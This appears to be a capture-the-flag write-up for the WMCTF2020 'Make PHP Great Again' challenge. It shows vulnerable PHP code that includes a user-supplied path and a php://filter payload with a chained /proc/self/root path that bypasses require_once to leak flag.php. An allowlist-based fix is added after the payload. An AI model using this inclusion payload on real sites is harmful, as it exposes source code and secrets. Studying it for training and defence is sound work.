[WMCTF2020]Make PHP Great Again 2.0&[WMCTF2020]Make PHP Great Again
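Source code
<?php
highlight_file(__FILE__);
// flag.php is included once here, so require_once treats it as already loaded
require_once 'flag.php';
if(isset($_GET['file'])) {
    // The user-controlled path is passed straight to require_once
    require_once $_GET['file'];
}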
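Key points
PHP source code analysis: bypassing the require_once restriction on including the same file twice
Solution steps
Following the article above, include the file a second time.
payload: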
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
/proc/self points to the current process's /proc/pid/ directory, and /proc/self/root/ is a symbolic link to /.
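
A hardened form of the include above, as an added example that is not part of the challenge or the original write-up: the request value is only ever used as a key into a fixed allowlist, so stream wrappers and /proc/self/root chains never reach require_once. The page names, the ALLOWED_PAGES map, resolve_page() and the demo directory are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code): resolve a user-supplied page name
// through a fixed allowlist so no request value ever reaches require_once.

// Hypothetical page map; its keys are the only values accepted for ?file=.
const ALLOWED_PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

/**
 * Return the absolute path to include for $name, or null when rejected.
 * $baseDir is an assumed directory that holds only includable pages.
 */
function resolve_page(string $name, string $baseDir): ?string
{
    // Exact-match lookup: wrappers (php://filter/...), absolute paths and
    // /proc/self/root chains are never map keys, so they stop here.
    if (!array_key_exists($name, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$name]);
    // realpath() returns false when resolution fails; treat that as a reject.
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved target must stay inside $baseDir even
    // if a mapped file is later replaced by a symlink.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo inputs; the second is a shortened form of the payload above.
$dir = sys_get_temp_dir() . '/pages_demo';
@mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';");
$inputs = [
    'home',
    'php://filter/convert.base64-encode/resource=/proc/self/root/var/www/html/flag.php',
    '../flag.php',
];
foreach ($inputs as $in) {
    echo (resolve_page($in, $dir) === null ? 'REJECT ' : 'ALLOW  '), $in, PHP_EOL;
}
```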